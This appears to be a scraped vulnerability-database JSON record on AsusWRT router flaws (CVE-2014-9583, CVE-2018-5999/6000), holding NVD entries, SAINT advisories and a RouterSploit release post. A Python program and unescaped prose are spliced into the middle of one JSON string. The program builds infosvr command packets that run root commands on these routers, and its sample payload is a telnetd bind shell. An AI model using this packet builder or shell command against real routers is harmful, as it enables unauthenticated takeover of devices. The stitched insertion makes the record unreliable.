prompt\r\n return true\r\n end\r\n end\r\n end\r\n rescue ::Timeout::Error\r\n return nil\r\n end\r\nend\n\n# 0day.today [2018-04-22] #", "sourceHref": "https://0day.today/exploit/30222", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2023-06-23T15:10:48", "description": "An issue was discovered in AsusWRT before 3.0.0.4.384_10007. The do_vpnupload_post function in router/httpd/web.c in vpnupload.cgi provides functionality for setting NVRAM configuration values, which allows attackers to set the admin password and launch an SSH daemon (or enable infosvr command mode), and consequently obtain remote administrative access, via a crafted request. This is available to unauthenticated attackers in conjunction with CVE-2018-5999.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-22T20:29:00", "type": "cve", "title": "CVE-2018-6000", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999", "CVE-2018-6000"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-6000", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6000", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-23T15:10:49", "description": "An issue was discovered in AsusWRT before 3.0.0.4.384_10007. In the handle_request function in router/httpd/httpd.c, processing of POST requests continues even if authentication fails.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-22T20:29:00", "type": "cve", "title": "CVE-2018-5999", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-5999", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5999", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-08-16T07:27:50", "description": "common.c in infosvr in ASUS WRT firmware 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52, and other versions, as used in RT-AC66U, RT-N66U, and other routers, does not properly check the MAC address for a request, which allows remote attackers to bypass 
authentication and execute arbitrary commands via a NET_CMD_ID_MANU_CMD packet to UDP port 9999. NOTE: this issue was incorrectly mapped to CVE-2014-10000, but that ID is invalid due to its use as an example of the 2014 CVE ID syntax change.", "cvss3": {}, "published": "2015-01-08T20:59:00", "type": "cve", "title": "CVE-2014-9583", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-10000", "CVE-2014-9583"], "modified": "2018-04-27T01:29:00", "cpe": ["cpe:/o:t-mobile:tm-ac1900:3.0.0.4.376_3169", "cpe:/o:asus:wrt_firmware:3.0.0.4.376_1071", "cpe:/o:asus:wrt_firmware:3.0.0.4.376.2524-g0012f52"], "id": "CVE-2014-9583", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9583", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:asus:wrt_firmware:3.0.0.4.376_1071:*:*:*:*:*:*:*", "cpe:2.3:o:t-mobile:tm-ac1900:3.0.0.4.376_3169:*:*:*:*:*:*:*", "cpe:2.3:o:asus:wrt_firmware:3.0.0.4.376.2524-g0012f52:*:*:*:*:*:*:*"]}], "pentestit": [{"lastseen": "2018-10-18T18:23:37", "description": "PenTestIT RSS Feed\n\n**RouterSploit 3.4.0**, the long awaited [_router exploitation framework_](<http://pentestit.com/routersploit-router-exploitation-framework/>) update is out guys! This release includes some really cool features and updates such as using `pycryptodome` from `pycrypto`and newer exploitation modules! 
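
The infosvr datagram that both Metasploit modules on this page build, as an added example in Python rather than code from the page, Metasploit, RouterSploit or AsusWRT. It packs the iboxPKTEx header and PKT_SYSCMD body quoted from iboxcom.h in the advisory the way the modules do (little-endian fields, random Info and MAC, an empty password the daemon never checks, 512-byte datagram) and then parses raw datagrams back so a sensor can flag NET_CMD_ID_MANU_CMD traffic to UDP/9999 and recover the command it carries. The same packet is what CVE-2014-9583 accepted unconditionally and what the 2018 chain re-enables by setting ateCommand_flag. The opcode used for the benign sample is a constructed value, not a real infosvr constant; nothing is sent.

```python
"""Encoder and decoder for the infosvr PKT_SYSCMD datagram (UDP/9999).

Added example, not code from the page or from Metasploit, RouterSploit or
AsusWRT. Field layout follows the iboxPKTEx / PKT_SYSCMD structs quoted from
iboxcom.h; endianness and the 512-byte size follow the Metasploit modules.
"""
import os
import struct

NET_SERVICE_ID_IBOX_INFO = 0x0C
NET_PACKET_TYPE_CMD = 0x15
NET_CMD_ID_MANU_CMD = 0x33
INFOSVR_PORT = 9999

# iboxPKTEx: ServiceID, PacketType, OpCode, Info, MacAddress[6], Password[32]
HEADER = struct.Struct('<BBHI6s32s')   # 46 bytes, little-endian, no padding
CMD_MAX = 420                          # PKT_SYSCMD.cmd[420]
PKT_SIZE = 512                         # datagram size both modules send


def build_packet(opcode, body, mac=None, password=b''):
    """Generic iboxPKTEx header followed by body, zero-padded to PKT_SIZE."""
    if len(password) > 31:
        raise ValueError('Password is a 32-byte NUL-terminated field')
    header = HEADER.pack(
        NET_SERVICE_ID_IBOX_INFO,
        NET_PACKET_TYPE_CMD,
        opcode,
        int.from_bytes(os.urandom(4), 'little'),   # Info / transaction id, never validated
        mac or os.urandom(6),                       # "checked" with memcpy, not memcmp (CVE-2014-9583)
        password.ljust(32, b'\0'),                  # not checked at all
    )
    datagram = header + body
    if len(datagram) > PKT_SIZE:
        raise ValueError('body does not fit in the datagram')
    return datagram.ljust(PKT_SIZE, b'\0')


def build_syscmd(command, **kw):
    """PKT_SYSCMD: WORD len + cmd[420]; infosvr runs it as root when accepted."""
    if len(command) >= CMD_MAX:
        raise ValueError('command must fit in cmd[420] with a terminating NUL')
    body = struct.pack('<H', len(command)) + command.ljust(CMD_MAX, b'\0')
    return build_packet(NET_CMD_ID_MANU_CMD, body, **kw)


def parse_packet(datagram):
    """Decode one datagram; None if it is not an ibox command packet."""
    if len(datagram) < HEADER.size:
        return None
    sid, ptype, opcode, _info, mac, password = HEADER.unpack_from(datagram)
    if sid != NET_SERVICE_ID_IBOX_INFO or ptype != NET_PACKET_TYPE_CMD:
        return None
    result = {
        'opcode': opcode,
        'manu_cmd': opcode == NET_CMD_ID_MANU_CMD,
        'mac': mac.hex(':'),
        'password_empty': password.rstrip(b'\0') == b'',
        'command': None,
    }
    if result['manu_cmd'] and len(datagram) >= HEADER.size + 2:
        (length,) = struct.unpack_from('<H', datagram, HEADER.size)
        start = HEADER.size + 2
        raw = datagram[start:start + min(length, CMD_MAX)]
        result['command'] = raw.split(b'\0', 1)[0].decode('ascii', 'replace')
    return result


def alerts(flows):
    """Run the decoder over (src_ip, dst_port, payload) records.

    Returns (src_ip, command) for every manufacturing-command datagram sent
    to UDP/9999, whether or not ateCommand_flag would have let it execute:
    nothing on a production LAN should be sending these.
    """
    found = []
    for src, dport, payload in flows:
        if dport != INFOSVR_PORT:
            continue
        info = parse_packet(payload)
        if info and info['manu_cmd']:
            found.append((src, info['command']))
    return found


if __name__ == '__main__':
    # Constructed sample flows: one attack datagram, one other ibox packet, one unrelated.
    flows = [
        ('192.168.1.50', INFOSVR_PORT, build_syscmd(b'telnetd -l /bin/sh -p 4444')),
        ('192.168.1.51', INFOSVR_PORT, build_packet(0x01, b'')),
        ('192.168.1.52', 53, b'\x00' * 32),
    ]
    print(alerts(flows))
```

Point `alerts()` at UDP payloads pulled from a LAN capture; because the check keys on the ServiceID/PacketType/OpCode triple rather than on the flag state, it catches both the 2014 variant and the 2018 chain, and the recovered command (typically a telnetd launch on a high port) tells you which port to look for an interactive root shell on.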
Read on for the improvements.\n\n\n\nWhat is RouterSploit?\n\n> The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of the following modules that aids penetration testing operations:\n> \n> * exploits \u2013 modules that take advantage of identified vulnerabilities\n> * creds \u2013 modules designed to test credentials against network services\n> * scanners \u2013 modules that check if a target is vulnerable to any exploit\n> * payloads \u2013 modules that are responsible for generating payloads for various architectures and injection points\n> * generic \u2013 modules that perform generic attacks\n\n## Official RouterSploit 3.4.0 changelog:\n\n * Fixing `setup.py` resources\n * Switching to pycroptodome\n * Fixing communication API\n * Adding `exploits/routers/asus/asuswrt_lan_rce.py` module (CVE-2018-5999/CVE-2018-6000)\n * Fixing `exploits/routers/asus/infosvr_backdoor_rce.py` module\n * Adding credentials used by Mirai botnet\n * Fixing 3com Officeconnect RCE module\n * Fixing `exploits/routers/billion/billion_5200w_rce.py` module\n * Fixing `exploits/routers/cisco/catalyst_2960_rocem.py` module (CVE-2017-3881)\n * Fixing `exploits/routers/cisco/firepower_management60_rce.py` module (CVE-2016-6433)\n * Fixing `exploits/routers/dlink/dir_815_850l_rce.py` module\n * Fixing `exploits/routers/multi/tcp_32764_rce.py` module\n * Fixing `exploits/routers/ubiquiti/airos_6_x.py` module\n * Adding `OptEncoder` option\n * Fixing `use` command issue\n * Adding tests `tests/exploits/cameras/cisco/test_video_surv_path_traversal.py`\n * Adding tests for modules default values\n * Adding tests `tests/exploits/routers/asus/test_infosvr_backdoor_rce.py`\n * Adding tests `tests/exploits/routers/billion/test_billion_5200w_rce.py`\n * Adding tests `tests/exploits/routers/cisco/test_firepower_management60_rce.py`\n * Adding tests `tests/exploits/routers/cisco/test_secure_acs_bypass.py`\n * Adding tests 
`tests/exploits/routers/dlink/test_dcs_930l_auth_rce.py`\n * Adding tests `tests/exploits/routers/technicolor/test_tg784_authbypass.py`\n * Adding tests `tests/exploits/routers/dlink/test_dsl_2730b_2780b_526b_dns_change.py`\n * Fixing `exploits/routers/ipfire/ipfire_proxy_rce.py` module\n * Fixing `exploits/routers/ipfire/ipfire_shellshock.py` module\n * Adding `exploits/routers/linksys/eseries_themoon_rce.py` module\n\n## Install RouterSploit 3.4.0:\n\nIf you have an older version checked out, all you now need to get the latest version is run: `git pull` in the installed directory and you should be updated to the latest version. In case you do not have it installed, the current version is RouterSploit 3.4.0. Check out the [GIT repository](<https://github.com/threat9/routersploit>), and run\n \n \n pip3 install -r requirements.txt\n ./rsf.py\n\nThe post [UPDATED VERSION: RouterSploit 3.4.0](<http://pentestit.com/updated-version-routersploit-3-4-0/>) appeared first on [PenTestIT](<http://pentestit.com>).", "cvss3": {}, "published": "2018-10-18T18:13:04", "type": "pentestit", "title": "UPDATED VERSION: RouterSploit 3.4.0", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2016-6433", "CVE-2017-3881", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-10-18T18:13:04", "id": "PENTESTIT:30AF1FB3AAE47288E800B5587788AF45", "href": "http://pentestit.com/updated-version-routersploit-3-4-0/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2023-07-13T15:27:58", "description": "Added: 02/28/2018 \nCVE: [CVE-2018-5999](<https://vulners.com/cve/CVE-2018-5999>) \n\n\n### Background\n\n[ASUSWRT](<https://www.asus.com/ASUSWRT/>) is the firmware used in many ASUS devices. \n\n### Problem\n\nThe combination of two separate vulnerabilities in ASUSWRT allows remote attackers to execute arbitrary commands. The first vulnerability allows an unauthenticated user to make certain POST requests. 
The second allows NVRAM settings to be changed using a POST request to `**vpnupload.cgi**`. \n\n### Resolution\n\nUpgrade to ASUSWRT version 3.0.0.4.384_10007 or higher. \n\n### References\n\n<http://seclists.org/fulldisclosure/2018/Jan/78> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-28T00:00:00", "type": "saint", "title": "ASUSWRT vpnupload.cgi authentication bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2018-02-28T00:00:00", "id": "SAINT:9EC44034675C3CB4D052F0A57AE94026", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/asuswrt_vpnupload_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:22", "description": "Added: 02/28/2018 \nCVE: [CVE-2018-5999](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5999>) \n\n\n### Background\n\n[ASUSWRT](<https://www.asus.com/ASUSWRT/>) is the firmware used in many ASUS devices. 
\n\n### Problem\n\nThe combination of two separate vulnerabilities in ASUSWRT allows remote attackers to execute arbitrary commands. The first vulnerability allows an unauthenticated user to make certain POST requests. The second allows NVRAM settings to be changed using a POST request to `**vpnupload.cgi**`. \n\n### Resolution\n\nUpgrade to ASUSWRT version 3.0.0.4.384_10007 or higher. \n\n### References\n\n<http://seclists.org/fulldisclosure/2018/Jan/78> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-28T00:00:00", "type": "saint", "title": "ASUSWRT vpnupload.cgi authentication bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2018-02-28T00:00:00", "id": "SAINT:1FAFFE9723ECA2EE5DFB56A36466F828", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/asuswrt_vpnupload_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:16:57", "description": "Added: 02/28/2018 \nCVE: [CVE-2018-5999](<https://vulners.com/cve/CVE-2018-5999>) \n\n\n### 
Background\n\n[ASUSWRT](<https://www.asus.com/ASUSWRT/>) is the firmware used in many ASUS devices. \n\n### Problem\n\nThe combination of two separate vulnerabilities in ASUSWRT allows remote attackers to execute arbitrary commands. The first vulnerability allows an unauthenticated user to make certain POST requests. The second allows NVRAM settings to be changed using a POST request to `**vpnupload.cgi**`. \n\n### Resolution\n\nUpgrade to ASUSWRT version 3.0.0.4.384_10007 or higher. \n\n### References\n\n<http://seclists.org/fulldisclosure/2018/Jan/78> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-28T00:00:00", "type": "saint", "title": "ASUSWRT vpnupload.cgi authentication bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2018-02-28T00:00:00", "id": "SAINT:5069DD588A8DDA678A16F6B17DE4B1F1", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/asuswrt_vpnupload_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T08:49:41", "description": "Added: 
01/13/2015 \nCVE: [CVE-2014-9583](<https://vulners.com/cve/CVE-2014-9583>) \nBID: [71889](<http://www.securityfocus.com/bid/71889>) \nOSVDB: [116691](<http://www.osvdb.org/116691>) \n\n\n### Background\n\nASUS manufactures network devices, including routers and wireless repeaters. Some of these devices include the infosvr service, part of the \"ASUS Wireless Router Device Discovery Utility\". The infosvr service listens on port 9999/UDP. \n\n### Problem\n\nThe file `**common.c**` in infosvr used in ASUS RT-AC66U and other routers does not properly verify the source MAC address of incoming requests, thereby allowing an attacker on the local network to execute arbitrary commands less than 238 bytes sent to 9999/UDP as root. \n\n### Resolution\n\nUpdate the firmware to revision 3.0.0.4.376.3754 or newer. Manually check the firmware version because the router's \"Check for Update\" functionality may not work properly. \n\n### References\n\n<http://www.pcworld.com/article/2867252/exploit-allows-asus-routers-to-be-hacked-from-local-network.html> \n<http://www.zdnet.com/article/asus-routers-vulnerable-to-network-attack-exploit-published/> \n<https://github.com/jduck/asus-cmd> \n\n\n### Limitations\n\nThe exploit attempt must be launched from the same local network as the target. \n\nExploit was tested on ASUS RTN66U with firmware version 3.0.0.4.376_1071. 
\n\n", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "saint", "title": "ASUS Router infosvr Service Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9583"], "modified": "2015-01-13T00:00:00", "id": "SAINT:75674DE142EE6A5182F2C3AEAC3FE313", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/asus_rtn66u_infosvr", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-27T05:20:09", "description": "Added: 01/13/2015 \nCVE: [CVE-2014-9583](<https://vulners.com/cve/CVE-2014-9583>) \nBID: [71889](<http://www.securityfocus.com/bid/71889>) \nOSVDB: [116691](<http://www.osvdb.org/116691>) \n\n\n### Background\n\nASUS manufactures network devices, including routers and wireless repeaters. Some of these devices include the infosvr service, part of the \"ASUS Wireless Router Device Discovery Utility\". The infosvr service listens on port 9999/UDP. \n\n### Problem\n\nThe file `**common.c**` in infosvr used in ASUS RT-AC66U and other routers does not properly verify the source MAC address of incoming requests, thereby allowing an attacker on the local network to execute arbitrary commands less than 238 bytes sent to 9999/UDP as root. \n\n### Resolution\n\nUpdate the firmware to revision 3.0.0.4.376.3754 or newer. Manually check the firmware version because the router's \"Check for Update\" functionality may not work properly. 
\n\n### References\n\n<http://www.pcworld.com/article/2867252/exploit-allows-asus-routers-to-be-hacked-from-local-network.html> \n<http://www.zdnet.com/article/asus-routers-vulnerable-to-network-attack-exploit-published/> \n<https://github.com/jduck/asus-cmd> \n\n\n### Limitations\n\nThe exploit attempt must be launched from the same local network as the target. \n\nExploit was tested on ASUS RTN66U with firmware version 3.0.0.4.376_1071. \n\n", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "saint", "title": "ASUS Router infosvr Service Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9583"], "modified": "2015-01-13T00:00:00", "id": "SAINT:46C18EA8DC44A814054B124849F1C9B9", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/asus_rtn66u_infosvr", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:19", "description": "Added: 01/13/2015 \nCVE: [CVE-2014-9583](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9583>) \nBID: [71889](<http://www.securityfocus.com/bid/71889>) \nOSVDB: [116691](<http://www.osvdb.org/116691>) \n\n\n### Background\n\nASUS manufactures network devices, including routers and wireless repeaters. Some of these devices include the infosvr service, part of the \"ASUS Wireless Router Device Discovery Utility\". The infosvr service listens on port 9999/UDP. 
\n\n### Problem\n\nThe file `**common.c**` in infosvr used in ASUS RT-AC66U and other routers does not properly verify the source MAC address of incoming requests, thereby allowing an attacker on the local network to execute arbitrary commands less than 238 bytes sent to 9999/UDP as root. \n\n### Resolution\n\nUpdate the firmware to revision 3.0.0.4.376.3754 or newer. Manually check the firmware version because the router's \"Check for Update\" functionality may not work properly. \n\n### References\n\n<http://www.pcworld.com/article/2867252/exploit-allows-asus-routers-to-be-hacked-from-local-network.html> \n<http://www.zdnet.com/article/asus-routers-vulnerable-to-network-attack-exploit-published/> \n<https://github.com/jduck/asus-cmd> \n\n\n### Limitations\n\nThe exploit attempt must be launched from the same local network as the target. \n\nExploit was tested on ASUS RTN66U with firmware version 3.0.0.4.376_1071. \n\n", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "saint", "title": "ASUS Router infosvr Service Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9583"], "modified": "2015-01-13T00:00:00", "id": "SAINT:79379382D62E420B234A449DAE36D8AE", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/asus_rtn66u_infosvr", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:57", "description": "Added: 01/13/2015 \nCVE: 
[CVE-2014-9583](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9583>) \nBID: [71889](<http://www.securityfocus.com/bid/71889>) \nOSVDB: [116691](<http://www.osvdb.org/116691>) \n\n\n### Background\n\nASUS manufactures network devices, including routers and wireless repeaters. Some of these devices include the infosvr service, part of the \"ASUS Wireless Router Device Discovery Utility\". The infosvr service listens on port 9999/UDP. \n\n### Problem\n\nThe file `**common.c**` in infosvr used in ASUS RT-AC66U and other routers does not properly verify the source MAC address of incoming requests, thereby allowing an attacker on the local network to execute arbitrary commands less than 238 bytes sent to 9999/UDP as root. \n\n### Resolution\n\nUpdate the firmware to revision 3.0.0.4.376.3754 or newer. Manually check the firmware version because the router's \"Check for Update\" functionality may not work properly. \n\n### References\n\n<http://www.pcworld.com/article/2867252/exploit-allows-asus-routers-to-be-hacked-from-local-network.html> \n<http://www.zdnet.com/article/asus-routers-vulnerable-to-network-attack-exploit-published/> \n<https://github.com/jduck/asus-cmd> \n\n\n### Limitations\n\nThe exploit attempt must be launched from the same local network as the target. \n\nExploit was tested on ASUS RTN66U with firmware version 3.0.0.4.376_1071. 
\n\n", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "saint", "title": "ASUS Router infosvr Service Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583"], "modified": "2015-01-13T00:00:00", "id": "SAINT:4A5BD29FAF80B56E6590F3C648A7268F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/asus_rtn66u_infosvr", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:38:45", "description": "A remote command execution vulnerability exists in Asuswrt. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {}, "published": "2016-10-26T00:00:00", "type": "checkpoint_advisories", "title": "ASUSWRT LAN Backdoor Remote Command Execution (CVE-2014-9583)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9583"], "modified": "2017-09-19T00:00:00", "id": "CPAI-2016-0934", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:32:47", "description": "<p><strong>Vulnerability Summary</strong></p><p>On October 3, 2014, the overseas security researcher Joshua J. 
